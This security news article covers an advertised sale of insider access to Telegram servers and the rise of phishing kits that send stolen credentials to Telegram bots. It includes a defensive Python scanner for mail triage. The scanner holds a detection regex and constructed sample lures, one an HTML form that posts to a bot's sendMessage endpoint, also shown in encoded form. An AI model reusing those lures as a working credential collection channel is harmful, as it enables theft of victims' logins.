Threat actors assert that they can give insider access to Telegram servers, which run the encrypted instant messaging application favored by a security-conscious clientele, for a non-negotiable fee of $20,000 per server.
The advertisement, which the researchers at SafetyDetectives found on a Dark Web marketplace, advertises that the access is high-level and given “via their personnel.”
The SafetyDetectives team said that the merchant is peddling “an offering of correspondence for six months” as opposed to giving remote access.
The SafetyDetectives article stated that “it is impossible to say how many users, or Telegram servers, may be disrupted.” However, if the vendor’s allegations are true, a user inside the internal Telegram network might compromise user data and exfiltrate logs.
Meanwhile, it appears that Telegram may have a larger phishing problem.
Explosion of phishing on Telegram
The revelation follows the publication of fresh data from Cofense that demonstrates how threat actors used malicious HTML attachments to deliver credential phishing attempts, causing Telegram bot abuse to increase by 800% in 2022. Because they are free and simple to set up and manage, Telegram bots are also appealing to spear-phishers.
The ease of setting up bots in a private or group chat, the bots’ compatibility with a variety of programming languages, and the ease of integrating them into malicious tooling such as malware or credential phishing kits are all praised by threat actors, according to the Cofense analysis. By combining the simplicity of setting up and using a Telegram bot with the well-known and effective method of attaching an HTML credential phishing file to an email, a threat actor can reach inboxes quickly and effectively while funnelling stolen credentials to a single collection point on a frequently trusted service.
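Because the HTML attachments described above have to carry the bot’s API endpoint somewhere in their markup or script, mail-gateway triage can look for that endpoint directly. The following scanner is an added example, not code from Cofense or from the article; it assumes the public Bot API URL form `https://api.telegram.org/bot<TOKEN>/<method>`, uses an approximate token shape for matching, and all sample HTML and tokens are constructed.

```python
import html
import re
from urllib.parse import unquote

# Bot API calls use the public URL form https://api.telegram.org/bot<TOKEN>/<method>; the token
# shape below (numeric bot id, colon, secret) is an approximation for matching, not a spec.
BOT_CALL_RE = re.compile(
    r"api\.telegram\.org/bot(?P<token>\d{6,12}:[A-Za-z0-9_-]{30,45})/(?P<method>[A-Za-z]+)",
    re.IGNORECASE)
HOST_RE = re.compile(r"api\.telegram\.org", re.IGNORECASE)

def normalize(doc: str) -> str:
    """Undo HTML entities and percent-encoding (repeatedly, for double-encoded text)."""
    prev, cur = None, doc
    for _ in range(3):
        cur = unquote(html.unescape(cur))
        if cur == prev:
            break
        prev = cur
    return cur

def redact_token(token: str) -> str:
    """Keep the bot id for blocking/reporting, never the full secret."""
    bot_id, _, secret = token.partition(":")
    return f"{bot_id}:{secret[:3]}...{secret[-3:]}"

def scan_html_attachment(doc: str) -> dict:
    """Triage one attachment: 'high' = embedded Bot API call, 'medium' = API host
    referenced without a parsable call, 'clean' = neither. Tokens in evidence are redacted."""
    text = normalize(doc)
    calls = [{"bot_id": m.group("token").partition(":")[0],
              "token": redact_token(m.group("token")),
              "method": m.group("method")} for m in BOT_CALL_RE.finditer(text)]
    if calls:
        return {"verdict": "high", "reason": "Telegram Bot API call embedded in attachment", "calls": calls}
    if HOST_RE.search(text):
        return {"verdict": "medium", "reason": "api.telegram.org referenced, no parsable bot call", "calls": []}
    return {"verdict": "clean", "reason": "", "calls": []}

# Constructed samples (no real kit or token): a lure posting to a bot, the same lure with
# entity/percent encoding, and a benign page that only links to a public t.me channel.
SAMPLE_PHISH = ('<form onsubmit="fetch(\'https://api.telegram.org/bot1234567890:'
                'AAEconstructedSampleSecret000000000/sendMessage\')"></form>')
SAMPLE_ENCODED = ('<script>u="&#104;ttps://api&#46;telegram.org%2Fbot1234567890%3A'
                  'AAEconstructedSampleSecret000000000/sendDocument"</script>')
SAMPLE_BENIGN = '<p>Join us on <a href="https://t.me/examplechannel">Telegram</a>.</p>'

if __name__ == "__main__":
    for name, doc in [("phish", SAMPLE_PHISH), ("encoded", SAMPLE_ENCODED), ("benign", SAMPLE_BENIGN)]:
        print(name, scan_html_attachment(doc))
```

The bot id that survives redaction is what you hand to Telegram’s abuse channel or add to a blocklist; the secret never reaches the SIEM.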
How many users or Telegram servers may be impacted is unknown. But if the vendor’s assertions are true, a Telegram insider could corrupt user data and exfiltrate records from across the internal network. A hypothetical intrusion of this kind would likewise weaken the company’s privacy USP (i.e., Telegram’s reputation as a secure chat app). The seller also maintains that no hacking is involved.